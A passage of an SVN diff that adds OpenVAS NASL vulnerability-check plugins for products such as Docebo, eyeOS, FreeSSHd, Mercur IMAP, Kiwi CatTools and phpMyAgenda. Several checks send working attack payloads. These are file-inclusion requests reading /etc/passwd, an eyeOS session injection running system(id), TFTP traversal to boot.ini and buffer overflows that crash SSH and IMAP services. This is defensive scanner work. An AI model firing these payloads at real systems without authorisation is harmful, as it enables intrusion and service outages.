+ if (start_passive()) {
+ send(socket:soc, data:'LIST\r\n');
+ recv_listing = ftp_recv_listing(socket:soc2);
+ ftp_close(socket:soc2);
+ }
+}
+if (soc) ftp_close(socket:soc);
+
+# Try to grab the startup-config
+# That's what it's all about..
+if (strlen(recv_listing)) {
+ soc = open_sock_tcp(port);
+ if (soc &&
+ (ftp_authenticate(socket:soc, user:"blah", pass:"blah"))) {
+ send(socket:soc, data:'CWD nvram:\r\n');
+ recv = ftp_recv_line(socket:soc, retry:1);
+ if ("250" >< recv &&
+ (start_passive())) {
+ send(socket:soc, data:'RETR startup-config\r\n');
+ recv_config = ftp_recv_data(socket:soc2, line:500);
+ ftp_close(socket:soc2);
+ }
+ }
+}
+if (soc) ftp_close(socket:soc);
+
+if (strlen(recv_config)) {
+ report = string(
+ desc, "\r\n\r\n",
+ "Plugin output :\r\n\r\n",
+ "Partial startup-config file:\r\n",
+ recv_config);
+ security_hole(port:port, data:report);
+ exit(0);
+}
+else if (strlen(recv_listing)) {
+ security_hole(port:port, data:desc);
+ exit(0);
+}
+
Added: trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,64 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(25550);
+ script_version("$Revision: 1.2 $");
+
+ script_cve_id("CVE-2006-2679");
+ script_bugtraq_id(18094);
+ script_xref(name:"OSVDB", value:"25888");
+
+ name["english"] = "Cisco VPN Client Privilege Escalation Vulnerability";
+ script_name(english:name["english"]);
+
+ desc = "
+Synopsis :
+
+The remote windows host contains an application that is affected by a
+privilege escalation vulnerability.
+
+Description :
+
+The installed Cisco VPN Client version is prone to a privilege
+escalation attack. By using the 'Start before logon' feature in the
+VPN client dialer, a local attacker may gain privileges and execute
+arbitrary commands with SYSTEM privileges.
+
+See also :
+
+http://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml
+
+Solution:
+
+Upgrade to version 4.8.01.0300 or a later.
+
+Risk factor :
+
+High / CVSS Base Score : 7.0
+(AV:L/AC:L/Au:NR/C:C/I:C/A:C/B:N)";
+ script_description(english:desc);
+ summary = "Detects a privilege escalation in the Cisco VPN Client by query its version number";
+ script_summary(english:summary);
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Windows");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("cisco_vpn_client_detect.nasl");
+ script_require_keys("SMB/CiscoVPNClient/Version");
+ exit(0);
+}
+
+version = get_kb_item("SMB/CiscoVPNClient/Version");
+if (version) {
+ # These versions are reported vulnerable:
+ # - 2.x, 3.x, 4.0.x, 4.6.x, 4.7.x, 4.8.00.x
+ # Not vulnerable:
+ # - 4.7.00.0533
+ if ("4.7.00.0533" >< version) exit(0);
+ if (egrep(pattern:"^([23]\.|4\.([067]\.|8\.00)).+", string:version)) {
+ security_hole(port:get_kb_item("SMB/transport"));
+ }
+}
Added: trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl
===================================================================
--- trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,117 @@
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory / discovered by :
+# http://milw0rm.com/exploits/1817
+#
+
+desc = "
+Synopsis :
+
+The remote host contains a PHP application that is vulnerable
+to remote and local file inclusions.
+
+Description :
+
+At least one Docebo application is installed on the system.
+
+Docebo has multiple PHP based applications, including a content
+management system (DoceboCMS), a e-learning platform
+(DoceboLMS) and a knowledge maintenance system (DoceboKMS)
+
+By using a flaw in some PHP versions (PHP4 <= 4.4.0 and PHP5 <= 5.0.5)
+it is possible to include files by overwriting the $GLOBALS variable.
+
+This flaw exists if PHP's register_globals is enabled.
+
+See also :
+
+http://secunia.com/advisories/20260/
+http://www.hardened-php.net/advisory_202005.79.html
+
+Solution :
+
+Disable PHP's register_globals and/or upgrade to a newer PHP release.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6
+(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)";
+script_description(english:desc);
+
+if (description) {
+ script_id(200011);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2576",
+ "CVE-2006-2577");
+ script_bugtraq_id(18109);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"25757");
+ }
+
+ name["english"] = "Docebo GLOBALS Variable Overwrite Vulnerability";
+ script_name(english:name["english"]);
+
+ summary["english"] = "Checks for file inclusions errors in multiple Docebo applications";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+success = 0;
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/doceboLms", "/doceboKms", "/doceboCms", "/doceboCore", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ req = http_get(item:string(dir, "/index.php"), port:port);
+ res = http_keepalive_send_recv(data:req, port:port, bodyonly:0);
+
+ if (egrep(pattern:"^Set-Cookie:.+docebo_session=", string:res) ||
+ egrep(pattern:'title="Powered by Docebo(KMS|LMS|CMS)"', string:res) ||
+ egrep(pattern:"powered_by.+<a href[^/]+\/\/www\.docebo\.org", string:res)) {
+
+ uri = "/lib/lib.php";
+ globals[0] = "GLOBALS[where_framework]=";
+ globals[1] = "GLOBALS[where_lms]=";
+ lfile = "/etc/passwd";
+
+ for(n = 0; globals[n]; n++) {
+ req = http_get(item:string(dir, uri, "?", globals[n], lfile, "%00"), port:port);
+ recv = http_keepalive_send_recv(data:req, port:port, bodyonly:1);
+
+ if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv)) {
+ n++;
+ success = 1;
+ path += string("http://", get_host_name(), dir, "\n");
+ }
+ }
+ }
+}
+
+if (success) {
+ report = string(desc, "\n\n",
+ "Plugin output :\n\n",
+ "Below the full path to the vulnerable Docebo application(s):\n\n",
+ path);
+ security_warning(port:port, data:report);
+}
+exit(0);
Added: trunk/openvas-plugins/scripts/eyeos_command_execution.nasl
===================================================================
--- trunk/openvas-plugins/scripts/eyeos_command_execution.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/eyeos_command_execution.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,96 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+#
+# Original advisory / discovered by :
+# http://www.gulftech.org/?node=research&article_id=00096-02072006
+#
+
+if (description) {
+ script_id();
+ script_version("$Revision: 1.0 $");
+
+ name["english"] = "EyeOS <= 0.8.9 Command Execution Vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote system contains a PHP application that is prone to
+command execution flaws.
+
+Description :
+
+The remote system is running a vulnerable version of eyeOS.
+
+EyeOS is a web based operating system, wich makes it possible
+to access data and applications remote by using a web-browser.
+
+The installed version does not initialize user sessions properly,
+allowing unauthenticated attackers to execute arbitrary commands
+with the privileges of the webserver.
+
+See also :
+
+http://www.gulftech.org/?node=research&article_id=00096-02072006
+
+Solution :
+
+Upgrade to eyeOS version 0.8.10.
+
+Risk factor :
+
+High / CVSS Base Score : 7
+(AV:R/AC:H/Au:NR/C:P/A:C/I:P/B:A)";
+ script_description(english:desc["english"]);
+
+ summary["english"] = "Check if EyeOS is vulnerable to command execution";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencie("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+# Check a few directories.
+if (thorough_tests) dirs = make_list("/eyeOS", "/eyeos", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ # Check if we find eyeOS installed.
+ res = http_get_cache(item:string(dir, "/desktop.php"), port:port);
+ if(res == NULL) exit(0);
+
+ if (egrep(pattern:">Welcome to eyeOS v\. [0-9.]+", string:res)) {
+ url = "eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=";
+ cmd = "system(id)";
+
+ # Try to execute a remote command.
+ req = http_get(item:string(dir, "/desktop.php?baccio=", url, cmd, ";"), port:port);
+ debug_print("req: ", req, "\n");
+
+ recv = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+ if (recv == NULL) exit(0);
+ debug_print("recv: ", recv, "\n");
+
+ if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:recv)) {
+ security_hole(port);
+ exit(0);
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,96 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(200010);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2407");
+ script_bugtraq_id(17958);
+
+ name["english"] = "FreeSSHD Key Exchange Buffer Overflow";
+ script_name(english:name["english"]);
+
+desc["english"] = "
+Synopsis :
+
+A vulnerable version of FreeSSHd is installed on
+the remote host.
+
+Description :
+
+The version installed does not validate key exchange strings
+send by a SSH client. This results in a buffer overflow
+and possible a compromise of the host if the client is
+sending a long key exchange string.
+
+See also :
+
+http://secunia.com/advisories/19846
+http://www.freesshd.com/?ctt=download
+
+Solution :
+
+Upgrade to the latest release.
+See second url in the 'See also' section.
+
+Note :
+
+At this point the FreeSSHD Service is reported down.
+You should start it manualy again.
+
+Risk factor :
+
+Critical / CVSS Base Score : 10
+(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)";
+ script_description(english:desc["english"]);
+
+ summary["english"] = "Checks for a buffer overflow in FreeSSHd";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DENIAL);
+ script_family(english:"Gain root remotely");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/ssh", 22);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+port = get_kb_item("Services/ssh");
+if (!port) port = 22;
+
+soc = open_sock_tcp(port);
+if (!soc) exit(0);
+
+banner = recv(socket:soc, length:128);
+if (egrep(pattern:"SSH.+WeOnlyDo", string:banner)) {
+
+ ident = "SSH-2.0-OpenSSH_4.2p1";
+ exp = ident + raw_string(
+ 0x0a, 0x00, 0x00, 0x4f, 0x04, 0x05,
+ 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xde)
+ + crap(length:20400);
+
+ send(socket:soc, data:exp);
+ recv(socket:soc, length:1024);
+ close(soc);
+
+ soc = open_sock_tcp(port);
+ if (soc) {
+ recv = recv(socket:soc, length:128);
+ close (soc);
+ }
+ if (!soc || (!strlen(recv))) {
+ security_hole(port);
+ }
+}
+exit(0);
Added: trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl
===================================================================
--- trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,114 @@
+#
+# Script Written By Ferdy Riphagen
+#
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(2000099);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2002-1603");
+ script_bugtraq_id(9239);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"13295");
+ }
+
+ name["english"] = "GoAhead WebServer Script Source Code Disclosure";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+A vulnerable version of GoAhead Webserver is running on the
+remote host.
+
+Description :
+
+GoAhead Webserver is installed on the remote system.
+It's an open-source webserver, which is capable of
+hosting ASP pages, and installation on multiple operating
+systems.
+
+The version installed is vulnerable to Script Source Code
+Disclosure, by adding extra characters to the URL. Possible
+characters are %00, %5C, %2F.
+
+See also :
+
+http://aluigi.altervista.org/adv/goahead-adv3.txt
+http://www.kb.cert.org/vuls/id/975041
+
+Solution :
+
+Upgrade to GoAhead WebServer 2.1.8 or a newer release.
+
+Risk factor :
+
+Medium / CVSS Base Score : 4
+(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:C)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for script source disclosure in GoAhead Webserver <= 2.1.7";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web Servers");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+function GetFileExt(file) {
+ ret = split(file, sep: '.');
+ return ret;
+}
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+
+banner = get_http_banner(port:port);
+if ("Server: GoAhead-Webs" >!< banner) exit(0);
+
+# Possible default file which still could be available.
+file[0] = "/treeapp.asp";
+
+# Below options could possible create false-positives.
+if (report_paranoia == 2 && (thorough_tests)) {
+ file[1] = "/default.asp";
+
+ if ("HTTP/1.0 302" && "Location:" >< banner) {
+ redirect = egrep(pattern:"^Location:", string:banner);
+ rfile = ereg_replace(pattern:"Location: http:\/\/+[^/]+", string:redirect, replace:"", icase:1);
+
+ # See if the file is really asp.
+ ret = GetFileExt(file:rfile);
+ if(!isnull(ret)) {
+ if (ereg(pattern:"asp", string:ret[1], icase:1)) {
+ file[2] = chomp(rfile);
+ }
+ }
+ }
+}
+
+for (n = 0; file[n]; n++) {
+ # Server doesn't support keepalives.
+ soc = http_open_socket(port);
+ if (!soc) exit(0);
+
+ req = string("GET ", file[n], "%5C HTTP/1.1\r\n\r\n");
+ send(socket:soc, data:req);
+
+ res = http_recv(socket:soc);
+ http_close_socket(soc);
+
+ if ('<% write(HTTP_AUTHORIZATION); %>' >< res ||
+ ('<%' >< res && ('%>' >< res))) {
+ security_warning(port);
+ exit(0);
+ }
+}
Added: trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl
===================================================================
--- trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,66 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+desc = "
+Synopsis :
+
+The remote tftpd server is affected by a directory traversal vulnerability.
+
+Description :
+
+Kiwi CatTools is installed on the remote host. The version installed is vulnerable
+to a directory traversal attack by using '[char]//..' sequences in the path. A attacker may be able to read and
+write files outside the tftp root.
+
+See also :
+
+http://www.kiwisyslog.com/kb/idx/5/178/article/
+http://marc.theaimsgroup.com/?l=bugtraq&m=117097429127488&w=2
+
+Solution :
+
+Upgrade to Kiwi CatTools version 3.2.9 or later.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6.8
+(AV:R/AC:L/Au:NR/C:C/A:N/I:P/B:C)";
+
+if (description) {
+ script_id(999991);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2007-0888");
+ script_bugtraq_id(22490);
+
+ name["english"] = "Kiwi CatTools < 3.2.9 Directory Traversal";
+ script_name(english:name["english"]);
+ script_description(english:desc);
+ summary["english"] = "Try to grab a file outside the tftp root";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"Remote file access");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("tftpd_detect.nasl");
+ script_require_keys("Services/udp/tftp");
+ exit(0);
+}
+
+include("tftp.inc");
+
+port = get_kb_item("Services/udp/tftp");
+if (!port) port = 69;
+
+get = tftp_get(port:port, path:"z//..//..//..//..//..//boot.ini");
+if (isnull(get)) exit(0);
+if (egrep(pattern:"default=multi.*disk.*partition", string:get)) {
+ report = string(
+ desc, "\n\n", "Plugin output :\n\n",
+ "The boot.ini file contains:\n", get);
+ security_warning(port, data:report);
+ exit(0);
+}
Added: trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,130 @@
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory :
+# http://archives.neohapsis.com/archives/fulldisclosure/2006-02/1837.html
+#
+
+desc["english"] = "
+Synopsis :
+
+The Mercur IMAP4 Service is running on the remote host.
+
+Description :
+
+A version of Mercur Mailserver or Messaging Server is installed
+on the remote host. It is a complete messaging solution including
+common functions like 'smtp/pop3/imap4-server'.
+
+The Mercur IMAP4 Service is vulnerable to buffer overflows
+by sending a special crafted 'login' command.
+An attacker can use this to crash the service, possible
+execute arbitrary code and gain some access privileges on the system.
+
+See also :
+
+http://secunia.com/advisories/19267/
+http://www.securityfocus.com/bid/17138
+
+Solution :
+
+Filter access to the IMAP4 Service, so that it can be used
+by trusted sources only.
+
+Risk factor :
+
+High / CVSS Base Score : 8
+(AV:R/AC:L/Au:NR/C:P/A:C/I:P/B:A)";
+script_description(english:desc["english"]);
+
+if (description) {
+ script_id(200050);
+ script_version("$Revision: 1.1 $");
+
+ script_bugtraq_id(17138);
+ script_cve_id("CVE-2006-1255");
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"23950");
+ }
+
+ name["english"] = "Mercur Mailserver/Messaging version <= 5.0 IMAP Overflow Vulnerability";
+ script_name(english:name["english"]);
+ summary["english"] = "Checks for buffer overflows in Mercur Mailserver/Messaging IMAP Services";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_MIXED_ATTACK);
+ script_family(english:"Gain a shell remotely");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("find_service.nes");
+ script_exclude_keys("imap/false_imap", "imap/overflow");
+ script_require_ports("Services/imap", 143);
+ exit(0);
+}
+
+include("imap_func.inc");
+include("global_settings.inc");
+
+port = get_kb_item("Services/imap");
+if (!port) port = 143;
+if (!get_port_state(port) ||
+ get_kb_item("imap/false_imap") ||
+ get_kb_item("imap/overflow")) exit(0);
+
+if (safe_checks()) {
+ soc = open_sock_tcp(port);
+ if (!soc) exit(0);
+
+ banner = get_imap_banner(port:port);
+ if (banner) debug_print("The remote IMAP4 banner is : ", banner, "\r\n");
+ if (egrep(pattern:".*MERCUR.*IMAP4.Server.*(v(4\.03|5\.00))", string:banner)) {
+
+ report = string(desc["english"], "\n\n",
+ "Note :\n\n",
+ "*** Nessus did only check for this vulnerability,\n",
+ "*** by using the banner of the remote IMAP4 service.\n",
+ "*** This might be a false positive.\n\n");
+
+ security_hole(port:port, data:report);
+ }
+ if (soc) close(soc);
+ exit(0);
+}
+
+else {
+ soc = open_sock_tcp(port);
+ if (!soc) exit(0);
+
+ banner = get_imap_banner(port:port);
+ if (banner) debug_print("The remote IMAP4 banner is: ", banner, "\r\n");
+
+ if (egrep(pattern:"OK.*MERCUR IMAP4.Server", string:banner)) {
+ exp = string("a0 LOGIN ", crap(data:raw_string(0x41), length:300), "\r\n");
+ send(socket:soc, data:exp);
+
+ recv = recv(socket:soc, length:1024);
+ if (recv != NULL) debug_print(level: 2, "Response: ", recv, "\r\n");
+ close(soc);
+
+ soc = open_sock_tcp(port);
+ if (soc) {
+ send(socket:soc, data:string("a1 CAPABILITY \r\n"));
+ recv2 = recv(socket:soc, length:1024);
+ if (recv2 != NULL) debug_print(level: 2, "Response2: ", recv2, "\r\n");
+ }
+ if (!soc || (!strlen(recv2))) {
+
+ report = string(desc["english"], "\n\n",
+ "Note :\n\n",
+ "*** It was possible to crash the MERCUR IMAP4 Service.\n",
+ "*** At this time the remote service does not accepting any new requests.\n",
+ "*** You should check its state, and possble start it manually again.\n\n");
+
+ security_hole(port:port, data:report);
+ }
+ }
+ if (soc) close(soc);
+ exit(0);
+}
Added: trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl
===================================================================
--- trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,115 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory / discovered by :
+# http://www.securityfocus.com/archive/1/431862/30/0/threaded
+#
+
+if (description) {
+ script_id(200002);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2009");
+ script_bugtraq_id(17670);
+
+ name["english"] = "phpMyAgenda version 3.0 File Inclusion Vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote web server contains a PHP application that is prone to
+remote and local file inclusions attacks.
+
+Description :
+
+phpMyAgenda is installed on the remote system. It's an open source
+event management system written in PHP.
+
+The application does not sanitize the 'rootagenda' parameter in some
+of it's files. This allows an attacker to include arbitrary files from
+remote systems and parse them with privileges of the account under
+which the web server is started.
+
+This vulnerability exists if PHP's 'register_globals' & 'magic_quotes_gpc'
+are both enabled for the local file inclusions flaw.
+And if 'allow_url_fopen' is also enabled remote file inclusions are also
+possible.
+
+See also :
+
+http://www.securityfocus.com/archive/1/431862/30/0/threaded
+
+Solution :
+
+No patch information provided at this time.
+Disable PHP's 'register_globals'
+
+Risk factor :
+
+High / CVSS Base Score : 7
+(AV:R/AC:L/Au:NR/C:P/A:P/I:P/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for a possible file inclusion flaw in phpMyAgenda";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencie("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/phpmyagenda", "/agenda", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ res = http_get_cache(item:string(dir, "/agenda.php3"), port:port);
+ #debug_print("res: ", res, "\n");
+
+ if(egrep(pattern:"<a href=[^?]+\?modeagenda=calendar", string:res)) {
+ file[0] = string("http://", get_host_name(), dir, "/bugreport.txt");
+ file[1] = "/etc/passwd";
+
+ req = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[0], "%00"), port:port);
+ #debug_print("request1= ", req, "\n");
+
+ recv = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
+ #debug_print("receive1= ", recv, "\n");
+ if (recv == NULL) exit(0);
+
+ if ("Bug report for phpMyAgenda" >< recv) {
+ security_hole(port);
+ exit(0);
+ }
+ else {
+ # Maybe PHP's 'allow_url_fopen' is set to Off on the remote host.
+ # In this case, try a local file inclusion.
+ req2 = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[1], "%00"), port:port);
+ #debug_print("request2= ", req2, "\n");
+
+ recv2 = http_keepalive_send_recv(data:req2, bodyonly:TRUE, port:port);
+ #debug_print("receive2= ", recv2, "\n");
+ if (recv2 == NULL) exit(0);
+
+ if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv2)) {
+ # PHP's 'register_globals' and 'magic_quotes_gpc' are enabled on the remote host.
+ security_hole(port);
+ exit(0);
+ }
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,117 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+
+desc["english"] = "
+Synopsis :
+
+The remote web server contains a PHP script that is prone to SQL
+injection attacks.
+
+Description :
+
+PHP-Fusion is installed on the remote system.
+It is a light-weight open-source content management system (CMS).
+
+A vulnerability is reported in the forum module of PHP-Fusion
+6.00.206 and some early released versions.
+When the forum module is activated, a registered user
+can execute arbitrary SQL injection commands.
+
+The failure exists because the application does not properly
+sanitize user-supplied input in 'options.php' and 'viewforum.php'
+before using it in the SQL query, and magic_quotes_gpc is set to off.
+
+See also :
+
+http://www.securityfocus.com/bid/15502
+http://secunia.com/advisories/17664/
+
+Solution :
+
+Apply the patch from the php-fusion main site:
+http://www.php-fusion.co.uk/downloads.php?cat_id=3
+
+Risk factor :
+
+Medium";
+
+
+if (description) {
+script_id(200010);
+script_version("$Revision: 1.0 $");
+
+script_cve_id("CVE-2005-3740");
+script_bugtraq_id(15502);
+
+name["english"] = "PHP-Fusion <= 6.00.206 Forum SQL Injection Vulnerability";
+script_name(english:name["english"]);
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Check if PHP-Fusion is vulnerable to SQL Injection attacks";
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+script_family(english:"CGI abuses");
+
+script_copyright(english:"This script is Copyright (C) 2005 Ferdy Riphagen");
+
+script_dependencie("http_version.nasl");
+script_require_ports("Services/www", 80);
+script_exclude_keys("Settings/disable_cgi_scanning");
+
+exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/php-files", "/forum", "/", "/fusion", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs)
+{
+ # Check if PHP-Fusion exists.
+ res = http_get_cache(item:string(dir, "/news.php"), port:port);
+ if (res == NULL) exit(0);
+
+ # Check for the vulnerable versions.
+ if (egrep(pattern: ">Powered by.*PHP-Fusion.*v([45]\.0[01])|6\.(00\.(1[01][56790]|20[46]))", string: res))
+ {
+ line = egrep(pattern: ">Powered by.*PHP-Fusion", string: res);
+
+ note = string(
+ "***** Nessus has determined that the vulnerable PHP-Fusion version\n",
+ "***** is installed on the remote host by checking its version number.\n",
+ "***** This might be an false positive.\n");
+
+ # Check and build the version.
+ version = ereg_replace(pattern:".*>Powered by.* v([0-9.]+).*", string:line, replace:"\1");
+ if (version != line)
+ {
+ # Build the report.
+ report = string(
+ desc["english"], "\n\n",
+ "Plugin output :\n\n",
+ "PHP-Fusion is installed on the remote system.\n",
+ "The version of the application is:\n",
+ "PHP-Fusion v", version, "\n\n",
+ "Note :\n\n", note);
+ }
+ else report =string(
+ desc["english"], "\n\n",
+ "Note :\n\n", note);
+
+ security_warning(port:port, data:report);
+ exit(0);
+ }
+}
Added: trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl
===================================================================
--- trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,103 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(2000201);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-5551");
